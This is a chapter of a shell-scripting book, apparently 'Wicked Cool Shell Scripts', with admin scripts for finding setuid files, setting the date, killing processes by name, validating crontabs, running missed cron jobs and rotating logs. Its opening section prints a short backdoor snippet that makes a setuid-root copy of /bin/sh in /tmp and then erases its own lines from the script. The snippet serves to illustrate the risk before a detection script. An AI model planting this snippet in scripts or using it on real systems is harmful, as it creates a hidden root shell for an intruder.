Wicked Cool Shell Scripts

6
SYSTEM ADMINISTRATION: SYSTEM MAINTENANCE

The most common use of shell scripts is to help with Unix or Linux system administration. There’s an obvious reason for this, of course: administrators are often the most knowledgeable users of the system, and they also are responsible for ensuring that things run smoothly. But there might be an additional reason for the emphasis on shell scripts within the system administration world. Our theory? That system administrators and other power users are the people most likely to be having fun with their system, and shell scripts are quite fun to develop within a Unix environment!

And with that, let’s continue to explore how shell scripts can help you with system administration tasks.

#45 Tracking Set User ID Applications

There are quite a few ways that ruffians and digital delinquents can break into a Linux system, whether they have an account or not, and one of the easiest is finding an improperly protected setuid or setgid command. As discussed in previous chapters, these commands change the effective user for any subcommands they invoke, as specified in the configuration, so a regular user might run a script where the commands in that script are run as the root or superuser. Bad. Dangerous!

In a setuid shell script, for example, adding the following code can create a setuid root shell for the bad guy once the code is invoked by an unsuspecting admin logged in as root.

if [ "${USER:-$LOGNAME}" = "root" ] ; then # REMOVEME
  cp /bin/sh /tmp/.rootshell               # REMOVEME
  chown root /tmp/.rootshell               # REMOVEME
  chmod -f 4777 /tmp/.rootshell            # REMOVEME
  grep -v "# REMOVEME" $0 > /tmp/junk      # REMOVEME
  mv /tmp/junk  $0                         # REMOVEME
fi # REMOVEME

Once this script is inadvertently run by root, a copy of /bin/sh is surreptitiously copied into /tmp with the name .rootshell and is made setuid root for the cracker to exploit at will. Then the script causes itself to be rewritten to remove the conditional code (hence the # REMOVEME at the end of each line), leaving essentially no trace of what the cracker did.

The code snippet just shown would also be exploitable in any script or command that runs with an effective user ID of root; hence the critical need to ensure that you know and approve of all setuid root commands on your system. Of course, you should never have scripts with any sort of setuid or setgid permission for just this reason, but it’s still smart to keep an eye on things.

More useful than showing you how to crack a system, however, is showing how to identify all the shell scripts on your system that are marked setuid or setgid! Listing 6-1 details how to accomplish this.

The Code

   #!/bin/bash

   # findsuid--Checks all SUID files or programs to see if they're writeable,
   #   and outputs the matches in a friendly and useful format

   mtime="7"            # How far back (in days) to check for modified cmds.
   verbose=0            # By default, let's be quiet about things.

   if [ "$1" = "-v" ] ; then
     verbose=1          # User specified findsuid -v, so let's be verbose.
   fi

   # find -perm looks at the permissions of the file: 4000 and above
   #   are setuid/setgid.

➊ find / -type f -perm +4000 -print0 | while read -d '' -r match
   do
     if [ -x "$match" ] ; then

       # Let's split file owner and permissions from the ls -ld output.

       owner="$(ls -ld $match | awk '{print $3}')"
       perms="$(ls -ld $match | cut -c5-10 | grep 'w')"

       if [ ! -z $perms ] ; then
         echo "**** $match (writeable and setuid $owner)"
       elif [ ! -z $(find $match -mtime -$mtime -print) ] ; then
         echo "**** $match (modified within $mtime days and setuid $owner)"
       elif [ $verbose -eq 1 ] ; then
         # By default, only dangerous scripts are listed. If verbose, show all.
         lastmod="$(ls -ld $match | awk '{print $6, $7, $8}')"
         echo "     $match (setuid $owner, last modified $lastmod)"
       fi
     fi
   done

   exit 0

Listing 6-1: The findsuid script

How It Works

This script checks all setuid commands on the system to see whether they’re group or world writable and whether they’ve been modified in the last $mtime days. To accomplish this, we use the find command ➊ with arguments specifying the types of permissions on files to search for. If the user requests verbose output, every script with setuid permissions will be listed, regardless of read/write permission and modification date.

Running the Script

This script has one optional argument: -v produces verbose output that lists every setuid program encountered by the script. This script should be run as root, but it can be run as any user since everyone should have basic access to the key directories.

The Results

We’ve dropped a vulnerable script somewhere in the system. Let’s see if findsuid can find it in Listing 6-2.

$ findsuid
**** /var/tmp/.sneaky/editme (writeable and setuid root)

Listing 6-2: Running the findsuid shell script and finding a backdoor shell script

There it is (Listing 6-3)!

$ ls -l /var/tmp/.sneaky/editme
-rwsrwxrwx  1 root  wheel  25988 Jul 13 11:50 /var/tmp/.sneaky/editme

Listing 6-3: The ls output of the backdoor, showing an s in the permissions, which means it is setuid

That’s a huge hole just waiting for someone to exploit. Glad we found it!

#46 Setting the System Date

Conciseness is at the heart of Linux and its Unix predecessors and has affected Linux’s evolution dramatically. But there are some areas where this succinctness can drive a sysadmin batty. One of the most common annoyances is the format required for resetting the system date, as shown by the date command:

usage: date [[[[[cc]yy]mm]dd]hh]mm[.ss]

Trying to figure out all the square brackets can be baffling, without even talking about what you do or don’t need to specify. We’ll explain: you can enter just minutes; or minutes and seconds; or hours, minutes, and seconds; or the month plus all that—or you can add the year and even the century. Yeah, crazy! Instead of trying to figure that out, use a shell script like the one in Listing 6-4, which prompts for each relevant field and then builds the compressed date string. It’s a sure sanity saver.

The Code

   #!/bin/bash
   # setdate--Friendly frontend to the date command
   # Date wants: [[[[[cc]yy]mm]dd]hh]mm[.ss]

   # To make things user-friendly, this function prompts for a specific date
   #   value, displaying the default in [] based on the current date and time.

   . library.sh   # Source our library of bash functions to get echon().

➊ askvalue()
   {
     # $1 = field name, $2 = default value, $3 = max value,
     # $4 = required char/digit length

     echon "$1 [$2] : "
     read answer

     if [ ${answer:=$2} -gt $3 ] ; then
       echo "$0: $1 $answer is invalid"
       exit 0
     elif [ "$(( $(echo $answer | wc -c) - 1 ))" -lt $4 ] ; then
       echo "$0: $1 $answer is too short: please specify $4 digits"
       exit 0
     fi
     eval $1=$answer   # Reload the given variable with the specified value.
   }

➋ eval $(date "+nyear=%Y nmon=%m nday=%d nhr=%H nmin=%M")

   askvalue year $nyear 3000 4
   askvalue month $nmon 12 2
   askvalue day $nday 31 2
   askvalue hour $nhr 24 2
   askvalue minute $nmin 59 2

   squished="$year$month$day$hour$minute"

   # Or, if you're running a Linux system:
➌ #   squished="$month$day$hour$minute$year"
   #   Yes, Linux and OS X/BSD systems use different formats. Helpful, eh?

   echo "Setting date to $squished. You might need to enter your sudo password:"
   sudo date $squished

   exit 0

Listing 6-4: The setdate script

How It Works

To make this script as succinct as possible, we use the eval function at ➋ to accomplish two things. First, this line sets the current date and time values, using a date format string. Second, it sets the values of the variables nyear, nmon, nday, nhr, and nmin, which are then used in the simple askvalue() function ➊ to prompt for and test values entered. Using the eval function to assign values to the variables also sidesteps any potential problem of the date rolling over or otherwise changing between separate invocations of the askvalue() function, which would leave the script with inconsistent data. For example, if askvalue got month and day values at 23:59.59 and then hour and minute values at 0:00:02, the system date would actually be set back 24 hours—not at all the desired result.

We also need to ensure we use the correct date format string for our system, since, for instance, OS X requires a specific format when setting the date and Linux requires a slightly different format. By default, this script uses the OS X date format, but notice in the comments that a format string for Linux is also provided at ➌.

This is one of the subtle problems with working with the date command. With this script, if you specify the exact time during the prompts but then have to enter a sudo password, you could end up setting the system time to a few seconds in the past. It’s probably not a problem, but this is one reason why network-connected systems should be working with Network Time Protocol (NTP) utilities to synchronize their system against an official timekeeping server. You can start down the path of network time synchronization by reading up on timed(8) on your Linux or Unix system.

Running the Script

Notice that this script uses the sudo command to run the actual date reset as root, as Listing 6-5 shows. By entering an incorrect password to sudo, you can experiment with this script without worrying about any strange results.

The Results

$ setdate
year [2017] :
month [05] :
day [07] :
hour [16] : 14
minute [53] : 50
Setting date to 201705071450. You might need to enter your sudo password:
passwd:
$

Listing 6-5: Testing the interactive setdate script

#47 Killing Processes by Name

Linux and some Unixes have a helpful command called killall, which allows you to kill all running applications that match a specified pattern. It can be quite useful when you want to kill nine mingetty daemons, or even just to send a SIGHUP signal to xinetd to prompt it to reread its configuration file. Systems that don’t have killall can emulate it in a shell script built around ps for identification of matching processes and kill to send the specified signal.

The trickiest part of the script is that the output format from ps varies significantly from OS to OS. For example, consider how differently FreeBSD, Red Hat Linux, and OS X show running processes in the default ps output. First take a look at the output of FreeBSD:

BSD $ ps
 PID TT  STAT    TIME COMMAND
 792  0  Ss   0:00.02 -sh (sh)
4468  0  R+   0:00.01 ps

Compare this output to that of Red Hat Linux:

RHL $ ps
  PID TTY          TIME CMD
 8065 pts/4    00:00:00 bash
12619 pts/4    00:00:00 ps

And finally, compare to the output of OS X:

OSX $ ps
  PID TTY           TIME CMD
37055 ttys000    0:00.01 -bash
26881 ttys001    0:00.08 -bash

Worse, rather than model its ps command after a typical Unix command, the GNU ps command accepts BSD-style flags, SYSV-style flags, and GNU-style flags. A complete mishmash!

Fortunately, some of these inconsistencies can be sidestepped in this particular script by using the cu flag, which produces far more consistent output that includes the owner of the process, the full command name, and—what we’re really interested in—the process ID.

This is also the first script where we’re really using all the power of the getopts command, which lets us work with lots of different command-line options and even pull in optional values. The script in Listing 6-6 has four starting flags, three of which have required arguments: -s SIGNAL, -u USER, -t TTY, and -n. You’ll see them in the first block of code.

The Code

   #!/bin/bash

   # killall--Sends the specified signal to all processes that match a
   #   specific process name

   # By default it kills only processes owned by the same user, unless you're
   #   root. Use -s SIGNAL to specify a signal to send to the process, -u USER
   #   to specify the user, -t TTY to specify a tty, and -n to only report what
   #   should be done, rather than doing it.

   signal="-INT"      # Default signal is an interrupt.
   user=""   tty=""   donothing=0

   while getopts "s:u:t:n" opt; do
     case "$opt" in
           # Note the trick below: the actual kill command wants -SIGNAL
           #   but we want SIGNAL, so we'll just prepend the "-" below.
       s ) signal="-$OPTARG";              ;;
       u ) if [ ! -z "$tty" ] ; then
             # Logic error: you can't specify a user and a TTY device
             echo "$0: error: -u and -t are mutually exclusive." >&2
             exit 1
           fi
           user=$OPTARG;                  ;;
       t ) if [ ! -z "$user" ] ; then
              echo "$0: error: -u and -t are mutually exclusive." >&2
              exit 1
           fi
           tty=$2;                        ;;
       n ) donothing=1;                   ;;
       ? ) echo "Usage: $0 [-s signal] [-u user|-t tty] [-n] pattern" >&2
           exit 1
     esac
   done

   # Done with processing all the starting flags with getopts...
   shift $(( $OPTIND - 1 ))

   # If the user doesn't specify any starting arguments (earlier test is for -?)
   if [ $# -eq 0 ] ; then
     echo "Usage: $0 [-s signal] [-u user|-t tty] [-n] pattern" >&2
     exit 1
   fi

   # Now we need to generate a list of matching process IDs, either based on
   #   the specified TTY device, the specified user, or the current user.

   if [ ! -z "$tty" ] ; then
➊   pids=$(ps cu -t $tty | awk "/ $1$/ { print \$2 }")
   elif [ ! -z "$user" ] ; then
➋   pids=$(ps cu -U $user | awk "/ $1$/ { print \$2 }")
   else
➌   pids=$(ps cu -U ${USER:-LOGNAME} | awk "/ $1$/ { print \$2 }")
   fi

   # No matches? That was easy!
   if [ -z "$pids" ] ; then
     echo "$0: no processes match pattern $1" >&2
     exit 1
   fi

   for pid in $pids
   do
     # Sending signal $signal to process id $pid: kill might still complain
     #   if the process has finished, the user doesn't have permission to kill
     #   the specific process, etc., but that's okay. Our job, at least, is done.
     if [ $donothing -eq 1 ] ; then
       echo "kill $signal $pid" # The -n flag: "show me, but don't do it"
     else
       kill $signal $pid
     fi
   done

   exit 0

Listing 6-6: The killall script

How It Works

Because this script is so aggressive and potentially dangerous, we’ve put extra effort into minimizing false pattern matches so that a pattern like sh won’t match output from ps that contains bash or vi crashtest.c or other values that embed the pattern. This is done by the pattern-match prefix on the awk command (➊, ➋, ➌).

Left-rooting the specified pattern, $1, with a leading space and right-rooting the pattern with a trailing $ causes the script to search for the specified pattern 'sh' in ps output as ' sh$'.

Running the Script

This script has a variety of starting flags that let you modify its behavior. The -s SIGNAL flag allows you to specify a signal other than the default interrupt signal, SIGINT, to send to the matching process or processes. The -u USER and -t TTY flags are useful primarily to the root user in killing all processes associated with a specified user or TTY device, respectively. And the -n flag gives you the option of having the script report what it would do without actually sending any signals. Finally, a process name pattern must be specified.

The Results

To kill all the csmount processes on OS X, you can now use the killall script, as Listing 6-7 shows.

$ ./killall -n csmount
kill -INT 1292
kill -INT 1296
kill -INT 1306
kill -INT 1310
kill -INT 1318

Listing 6-7: Running the killall script on any csmount processes

Hacking the Script

There’s an unlikely, though not impossible, bug that could surface while running this script. To match only the specified pattern, the awk invocation outputs the process IDs of processes that match the pattern, plus a leading space that occurs at the end of the input line. But it’s theoretically possible to have two processes running—say, one called bash and the other emulate bash. If killall is invoked with bash as the pattern, both of these processes will be matched, although only the former is a true match. Solving this to give consistent cross-platform results would prove quite tricky.

If you’re motivated, you could also write a script based heavily on the killall script that would let you renice jobs by name, rather than just by process ID. The only change required would be to invoke renice rather than kill. Invoking renice lets you change the relative priority of programs, allowing you, for example, to lower the priority of a long file transfer while increasing the priority of the video editor that the boss is running.

#48 Validating User crontab Entries

One of the most helpful facilities in the Linux universe is cron, with its ability to schedule jobs at arbitrary times in the future or have them run automatically every minute, every few hours, monthly, or even annually. Every good system administrator has a Swiss Army knife of scripts running from the crontab file.

However, the format for entering cron specifications is a bit tricky, and the cron fields have numeric values, ranges, sets, and even mnemonic names for days of the week or months. What’s worse is that the crontab program generates cryptic error messages when it encounters problems in a user or system cron file.

For example, if you specify a day of the week with a typo, crontab reports an error similar to the one shown here:

"/tmp/crontab.Dj7Tr4vw6R":9: bad day-of-week
crontab: errors in crontab file, can't install

In fact, there’s a second error in the sample input file, on line 12, but crontab is going to force us to take the long way around to find it in the script because of its poor error-checking code.

Instead of error checking the way crontab wants you to, a somewhat lengthy shell script (see Listing 6-8) can step through the crontab files, checking the syntax and ensuring that values are within reasonable ranges. One of the reasons that this validation is possible in a shell script is that sets and ranges can be treated as individual values. So to test whether 3-11 or 4, 6, and 9 are acceptable values for a field, simply test 3 and 11 in the former case and 4, 6, and 9 in the latter.

The Code

   #!/bin/bash
   # verifycron--Checks a crontab file to ensure that it's formatted properly.
   #   Expects standard cron notation of min hr dom mon dow CMD, where min is
   #   0-59, hr is 0-23, dom is 1-31, mon is 1-12 (or names), and dow is 0-7
   #   (or names). Fields can be ranges (a-e) or lists separated by commas
   #   (a,c,z) or an asterisk. Note that the step value notation of Vixie cron
   #   (e.g., 2-6/2) is not supported by this script in its current version.

   validNum()
   {
     # Return 0 if the number given is a valid integer and 1 if not.
     #   Specify both number and maxvalue as args to the function.
     num=$1   max=$2

     # Asterisk values in fields are rewritten as "X" for simplicity,
     #   so any number in the form "X" is de facto valid.

     if [ "$num" = "X" ] ; then
       return 0
     elif [ ! -z $(echo $num | sed 's/[[:digit:]]//g') ] ; then
       # Stripped out all the digits, and the remainder isn't empty? No good.
       return 1
     elif [ $num -gt $max ] ; then
       # Number is bigger than the maximum value allowed.
       return 1
     else
       return 0
     fi
   }

   validDay()
   {
     # Return 0 if the value passed to this function is a valid day name;
     #   1 otherwise.

     case $(echo $1 | tr '[:upper:]' '[:lower:]') in
       sun*|mon*|tue*|wed*|thu*|fri*|sat*) return 0 ;;
       X) return 0 ;;         # Special case, it's a rewritten "*"
       *) return 1
     esac
   }

   validMon()
   {
     # This function returns 0 if given a valid month name; 1 otherwise.

     case $(echo $1 | tr '[:upper:]' '[:lower:]') in
       jan*|feb*|mar*|apr*|may|jun*|jul*|aug*) return 0           ;;
       sep*|oct*|nov*|dec*)                    return 0           ;;
       X) return 0 ;; # Special case, it's a rewritten "*"
       *) return 1        ;;
     esac
   }

➊ fixvars()
   {
     # Translate all '*' into 'X' to bypass shell expansion hassles.
     #   Save original input as "sourceline" for error messages.

     sourceline="$min $hour $dom $mon $dow $command"
       min=$(echo "$min" | tr '*' 'X')      # Minute
       hour=$(echo "$hour" | tr '*' 'X')    # Hour
       dom=$(echo "$dom" | tr '*' 'X')      # Day of month
       mon=$(echo "$mon" | tr '*' 'X')      # Month
       dow=$(echo "$dow" | tr '*' 'X')      # Day of week
   }

   if [ $# -ne 1 ] || [ ! -r $1 ] ; then
     # If no crontab filename is given or if it's not readable by the script, fail.
     echo "Usage: $0 usercrontabfile" >&2
     exit 1
   fi

   lines=0  entries=0  totalerrors=0

   # Go through the crontab file line by line, checking each one.

   while read min hour dom mon dow command
   do
     lines="$(( $lines + 1 ))"
     errors=0

     if [ -z "$min" -o "${min%${min#?}}" = "#" ] ; then
       # If it's a blank line or the first character of the line is "#", skip it.
       continue    # Nothing to check
     fi


     ((entries++))

     fixvars

     # At this point, all the fields in the current line are split out into
     #   separate variables, with all asterisks replaced by "X" for convenience,
     #   so let's check the validity of input fields...

     # Minute check

➋   for minslice in $(echo "$min" | sed 's/[,-]/ /g') ; do
       if ! validNum $minslice 60 ; then
         echo "Line ${lines}: Invalid minute value \"$minslice\""
         errors=1
       fi
     done

     # Hour check

➌   for hrslice in $(echo "$hour" | sed 's/[,-]/ /g') ; do
       if ! validNum $hrslice 24 ; then
         echo "Line ${lines}: Invalid hour value \"$hrslice\""
         errors=1
       fi
     done

     # Day of month check

➍   for domslice in $(echo $dom | sed 's/[,-]/ /g') ; do
       if ! validNum $domslice 31 ; then
         echo "Line ${lines}: Invalid day of month value \"$domslice\""
         errors=1
       fi
     done

     # Month check: Has to check for numeric values and names both.
     #   Remember that a conditional like "if ! cond" means that it's
     #   testing whether the specified condition is FALSE, not true.

➎   for monslice in $(echo "$mon" | sed 's/[,-]/ /g') ; do
       if ! validNum $monslice 12 ; then
         if ! validMon "$monslice" ; then
           echo "Line ${lines}: Invalid month value \"$monslice\""
           errors=1
         fi
       fi
     done

     # Day of week check: Again, name or number is possible.

➏   for dowslice in $(echo "$dow" | sed 's/[,-]/ /g') ; do
       if ! validNum $dowslice 7 ; then
         if ! validDay $dowslice ; then
           echo "Line ${lines}: Invalid day of week value \"$dowslice\""
           errors=1
         fi
       fi
     done

     if [ $errors -gt 0 ] ; then
       echo ">>>> ${lines}: $sourceline"
       echo ""
       totalerrors="$(( $totalerrors + 1 ))"
     fi
   done < $1 # read the crontab passed as an argument to the script

   # Notice that it's here, at the very end of the while loop, that we
   #   redirect the input so that the user-specified filename can be
   #   examined by the script!

   echo "Done. Found $totalerrors errors in $entries crontab entries."

   exit 0

Listing 6-8: The verifycron script

How It Works

The greatest challenge in getting this script to work is sidestepping problems with the shell wanting to expand the asterisk field value (*). An asterisk is perfectly acceptable in a cron entry and is actually quite common, but if you give one to a subshell via a $( ) sequence or pipe, the shell will automatically expand it to a list of files in the current directory—definitely not the desired result. Rather than puzzle through the combination of single and double quotes necessary to solve this problem, it proves quite a bit simpler to replace each asterisk with an X, which is what the fixvars function ➊ does as it splits things into separate variables for later testing.

Also worthy of note is the simple solution to processing comma- and dash-separated lists of values. The punctuation is simply replaced with spaces, and each value is tested as if it were a stand-alone numeric value. That’s what the $( ) sequence does in the for loops at ➋, ➌, ➍, ➎, and ➏:

$(echo "$dow" | sed 's/[,-]/ /g')

This makes it simple to step through all numeric values, ensuring that each and every value is valid and within the range for that specific crontab field parameter.

Running the Script

This script is easy to run: just specify the name of a crontab file as its only argument. To work with an existing crontab file, see Listing 6-9.

$ crontab -l > my.crontab
$ verifycron my.crontab
$ rm my.crontab

Listing 6-9: Running the verifycron script after exporting the current cron file

The Results

Using a sample crontab file that has two errors and lots of comments, the script produces the results shown in Listing 6-10.

$ verifycron sample.crontab
Line 10: Invalid day of week value "Mou"
>>>> 10: 06 22 * * Mou /home/ACeSystem/bin/del_old_ACinventories.pl

Line 12: Invalid minute value "99"
>>>> 12: 99 22 * * 1-3,6 /home/ACeSystem/bin/dump_cust_part_no.pl

Done. Found 2 errors in 13 crontab entries.

Listing 6-10: Running the verifycron script on a cron file with invalid entries

The sample crontab file with the two errors, along with all the shell scripts explored in this book, are available at http://www.nostarch.com/wcss2/.

Hacking the Script

A few enhancements would potentially be worth adding to this script. Validating the compatibility of month and day combinations would ensure that users don’t schedule a cron job to run on, for example, 31 February. It could also be useful to check whether the command being invoked can actually be found, but that would entail parsing and processing a PATH variable (that is, a list of directories within which to look for commands specified in the script), which can be set explicitly within a crontab file. That could be quite tricky. . . . Lastly, you could add support for values such as @hourly or @reboot, special values in cron used to denote the common times scripts can run.

#49 Ensuring that System cron Jobs Are Run

Until recently, Linux systems were all designed to run as servers—up 24 hours a day, 7 days a week, forever. You can see that implicit expectation in the design of the cron facility: there’s no point in scheduling jobs for 2:17 AM every Thursday if the system is shut down at 6:00 PM every night.

Yet many modern Unix and Linux users are running on desktops and laptops and therefore do shut down their systems at the end of the day. It can be quite alien to OS X users, for example, to leave their systems running overnight, let alone over a weekend or holiday.

This isn’t a big deal with user crontab entries, because those that don’t run due to shutdown schedules can be tweaked to ensure that they do eventually get invoked. The problem arises when the daily, weekly, and monthly system cron jobs that are part of the underlying system are not run at the specified times.

That’s the purpose of the script in Listing 6-11: to allow the administrator to invoke the daily, weekly, or monthly jobs directly from the command line, as needed.

The Code

   #!/bin/bash

   # docron--Runs the daily, weekly, and monthly system cron jobs on a system
   #   that's likely to be shut down during the usual time of day when the system
   #   cron jobs would otherwise be scheduled to run.

   rootcron="/etc/crontab"   # This is going to vary significantly based on
                             # which version of Unix or Linux you've got.

   if [ $# -ne 1 ] ; then
     echo "Usage: $0 [daily|weekly|monthly]" >&2
     exit 1
   fi

   # If this script isn't being run by the administrator, fail out.
   #   In earlier scripts, you saw USER and LOGNAME being tested, but in
   #   this situation, we'll check the user ID value directly. Root = 0.

   if [ "$(id -u)" -ne 0 ] ; then
     # Or you can use $(whoami) != "root" here, as needed.
     echo "$0: Command must be run as 'root'" >&2
     exit 1
   fi

   # We assume that the root cron has entries for 'daily', 'weekly', and
   #   'monthly' jobs. If we can't find a match for the one specified, well,
   #   that's an error. But first, we'll try to get the command if there is
   #   a match (which is what we expect).

➊ job="$(awk "NF > 6 && /$1/ { for (i=7;i<=NF;i++) print \$i }" $rootcron)"

   if [ -z "$job" ] ; then   # No job? Weird. Okay, that's an error.
     echo "$0: Error: no $1 job found in $rootcron" >&2
     exit 1
   fi

   SHELL=$(which sh)        # To be consistent with cron's default

➋ eval $job                # We'll exit once the job is finished.

Listing 6-11: The docron script

How It Works

The cron jobs located in /etc/daily, /etc/weekly, and /etc/monthly (or /etc/cron.daily, /etc/cron.weekly, and /etc/cron.monthly) are set up completely differently from user crontab files: each is a directory that contains a set of scripts, one per job, that are run by the crontab facility, as specified in the /etc/crontab file. To make this even more confusing, the format of the /etc/crontab file is different too, because it adds an additional field that indicates what effective user ID should run the job.

The /etc/crontab file specifies the hour of the day (in the second column of the output that follows) at which to run the daily, weekly, and monthly jobs in a format that’s completely different from what you’ve seen as a regular Linux user, as shown here:

$ egrep '(daily|weekly|monthly)' /etc/crontab
# Run daily/weekly/monthly jobs.
15      3       *       *       *       root    periodic daily
30      4       *       *       6       root    periodic weekly
30      5       1       *       *       root    periodic monthly

What happens to the daily, weekly, and monthly jobs if this system isn’t running at 3:15 AM every night, at 4:30 AM on Saturday morning, and at 5:30 AM on the first of each month? Nothing. They just don’t run.

Rather than trying to force cron to run the jobs, the script we’ve written identifies the jobs in this file ➊ and runs them directly with the eval on the very last line ➋. The only difference between invoking the jobs found from this script and invoking them as part of a cron job is that when jobs are run from cron, their output stream is automatically turned into an email message, whereas this script displays the output stream on the screen.

You could, of course, duplicate cron’s email behavior by invoking the script as shown here:

./docron weekly | mail -E -s "weekly cron job" admin

Running the Script

This script must be run as root and has one parameter—either daily, weekly, or monthly—to indicate which group of system cron jobs you want to run. As usual, we highly recommend using sudo to run any script as root.

The Results

This script has essentially no direct output and displays only results from scripts run in the crontab, unless an error is encountered either within the script or within one of the jobs spawned by the cron scripts.

Hacking the Script

Some jobs shouldn’t be run more than once a week or once a month, so there really should be some sort of check in place to ensure they aren’t run more often. Furthermore, sometimes the recurring system jobs might well run from cron, so we can’t make a blanket assumption that if docron hasn’t run, the jobs haven’t run.

One solution would be to create three empty timestamp files, one each for daily, weekly, and monthly jobs, and then to add new entries to the /etc/daily, /etc/weekly, and /etc/monthly directories that update the last-modified date of each timestamp file with touch. This would solve half the problem: docron could then check the last time the recurring cron job was invoked and quit if an insufficient amount of time had passed to justify the job’s being run again.

The situation this solution doesn’t handle is this: six weeks after the monthly cron job last ran, the admin runs docron to invoke the monthly jobs. Then four days later, someone forgets to shut off their computer, and the monthly cron job is invoked. How can that job know that it’s not necessary to run the monthly jobs after all?

Two scripts can be added to the appropriate directory. One script must run first from run-script or periodic (the standard ways to invoke cron jobs) and can then turn off the executable bit on all other scripts in the directory except its partner script, which turns the executable bit back on after run-script or periodic has scanned and ascertained that there’s nothing to do: none of the files in the directory appear to be executable, and therefore cron doesn’t run them. This is not a great solution, however, because there’s no guarantee of script evaluation order, and if we can’t guarantee the order in which the new scripts will be run, the entire solution fails.

There might not be a complete solution to this dilemma, actually. Or it might involve writing a wrapper for run-script or periodic that would know how to manage timestamps to ensure that jobs weren’t executed too frequently. Or maybe we’re worrying about something that’s not really that big a deal in the big picture.

#50 Rotating Log Files

Users who don’t have much experience with Linux can be quite surprised by how many commands, utilities, and daemons log events to system log files. Even on a computer with lots of disk space, it’s important to keep an eye on the size of these files—and, of course, on their contents.

As a result, many sysadmins have a set of instructions that they place at the top of their log file analysis utilities, similar to the commands shown here:

mv $log.2 $log.3
mv $log.1 $log.2
mv $log $log.1
touch $log

If run weekly, this would produce a rolling one-month archive of log file information divided into week-size portions of data. However, it’s just as easy to create a script that accomplishes this for all log files in the /var/log directory at once, thereby relieving any log file analysis scripts of the burden and managing logs even in months when the admin doesn’t analyze anything.

The script in Listing 6-12 steps through each file in the /var/log directory that matches a particular set of criteria, checking each matching file’s rotation schedule and last-modified date to see whether it’s time for the file to be rotated. If it is time for a rotation, the script does just that.

The Code

#!/bin/bash
# rotatelogs--Rolls logfiles in /var/log for archival purposes and to ensure
#   that the files don't get unmanageably large. This script uses a config
#   file to allow customization of how frequently each log should be rolled.
#   The config file is in logfilename=duration format, where duration is
#   in days. If, in the config file, an entry is missing for a particular
#   logfilename, rotatelogs won't rotate the file more frequently than every
#   seven days. If duration is set to zero, the script will ignore that
#   particular set of log files.

logdir="/var/log"             # Your logfile directory could vary.
config="$logdir/rotatelogs.conf"
mv="/bin/mv"

default_duration=7     # We'll default to a 7-day rotation schedule.
count=0

duration=$default_duration

if [ ! -f $config ] ; then
  # No config file for this script? We're out. You could also safely remove
  #   this test and simply ignore customizations when the config file is
  #   missing.
  echo "$0: no config file found. Can't proceed." >&2
  exit 1
fi

if [ ! -w $logdir -o ! -x $logdir ] ; then
  # -w is write permission and -x is execute. You need both to create new
  #   files in a Unix or Linux directory. If you don't have 'em, we fail.
  echo "$0: you don't have the appropriate permissions in $logdir" >&2
  exit 1
fi

cd $logdir

# While we'd like to use a standardized set notation like :digit: with
#   the find, many versions of find don't support POSIX character class
#   identifiers--hence [0-9].

# This is a pretty gnarly find statement that's explained in the prose
#   further in this section. Keep reading if you're curious!

for name in $(➊find . -maxdepth 1 -type f -size +0c ! -name '*[0-9]*' \
     ! -name '\.*' ! -name '*conf' -print | sed 's/^\.\///')
do

  count=$(( $count + 1 ))
  # Grab the matching entry from the config file for this particular log file.

  duration="$(grep "^${name}=" $config|cut -d= -f2)"

  if [ -z "$duration" ] ; then
    duration=$default_duration   # If there isn't a match, use the default.
  elif [ "$duration" = "0" ] ; then
    echo "Duration set to zero: skipping $name"
    continue
  fi

  # Set up the rotation filenames. Easy enough:

  back1="${name}.1"; back2="${name}.2";
  back3="${name}.3"; back4="${name}.4";

  # If the most recently rolled log file (back1) has been modified within
  #   the specific quantum, then it's not time to rotate it. This can be
  #   found with the -mtime modification time test to find.

  if [ -f "$back1" ] ; then
    if [ -z "$(find \"$back1\" -mtime +$duration -print 2>/dev/null)" ]
    then
      /bin/echo -n "$name's most recent backup is more recent than $duration "
      echo "days: skipping" ;   continue
    fi
  fi

  echo "Rotating log $name (using a $duration day schedule)"

  # Rotate, starting with the oldest log, but be careful in case one
  #   or more files simply don't exist yet.

  if [ -f "$back3" ] ; then
    echo "... $back3 -> $back4" ; $mv -f "$back3" "$back4"
  fi
  if [ -f "$back2" ] ; then
    echo "... $back2 -> $back3" ; $mv -f "$back2" "$back3"
  fi
  if [ -f "$back1" ] ; then
    echo "... $back1 -> $back2" ; $mv -f "$back1" "$back2"
  fi
  if [ -f "$name" ] ; then
    echo "... $name -> $back1" ; $mv -f "$name" "$back1"
  fi
  touch "$name"
  chmod 0600 "$name"    # Last step: Change file to rw------- for privacy
done

if [ $count -eq 0 ] ; then
  echo "Nothing to do: no log files big enough or old enough to rotate"
fi

exit 0

Listing 6-12: The rotatelogs script

To be maximally useful, the script works with a configuration file that lives in /var/log, allowing the administrator to specify different rotation schedules for different log files. The contents of a typical configuration file are shown in Listing 6-13.

# Configuration file for the log rotation script: Format is name=duration,
#   where name can be any filename that appears in the /var/log directory.
#   Duration is measured in days.

ftp.log=30
lastlog=14
lookupd.log=7
lpr.log=30
mail.log=7
netinfo.log=7
secure.log=7
statistics=7
system.log=14
# Anything with a duration of zero is not rotated.
wtmp=0

Listing 6-13: An example configuration file for the rotatelogs script

How It Works

The heart of this script, and certainly the most gnarly part, is the find statement at ➊. The find statement creates a loop, returning all files in the /var/log directory that are greater than zero characters in size, don’t contain a number in their name, don’t start with a period (OS X in particular dumps a lot of oddly named log files in this directory—they all need to be skipped), and don’t end with conf (we don’t want to rotate out the rotatelogs.conf file, for obvious reasons). maxdepth 1 ensures that find doesn’t step into subdirectories, and the sed invocation at the very end removes any leading ./ sequences from the matches.

NOTE

Lazy is good! The rotatelogs script demonstrates a fundamental concept in shell script programming: the value of avoiding duplicate work. Rather than have each log analysis script rotate logs, a single log rotation script centralizes the task and makes modifications easy.

Running the Script

This script doesn’t accept any arguments, but it does print messages on which logs are being rotated and why. It should also be run as root.

The Results

The rotatelogs script is simple to use, as shown in Listing 6-14, but beware that depending on file permissions, it might need to be run as root.

$ sudo rotatelogs
ftp.log's most recent backup is more recent than 30 days: skipping
Rotating log lastlog (using a 14 day schedule)
... lastlog -> lastlog.1
lpr.log's most recent backup is more recent than 30 days: skipping

Listing 6-14: Running the rotatelogs script as root to rotate the logs in /var/log

Notice that only three log files matched the specified find criteria in this invocation. Of these, only lastlog hadn’t been backed up sufficiently recently, according to the duration values in the configuration file. Run rotatelogs again, however, and nothing’s done, as Listing 6-15 shows.

$ sudo rotatelogs
ftp.log's most recent backup is more recent than 30 days: skipping
lastlog's most recent backup is more recent than 14 days: skipping
lpr.log's most recent backup is more recent than 30 days: skipping

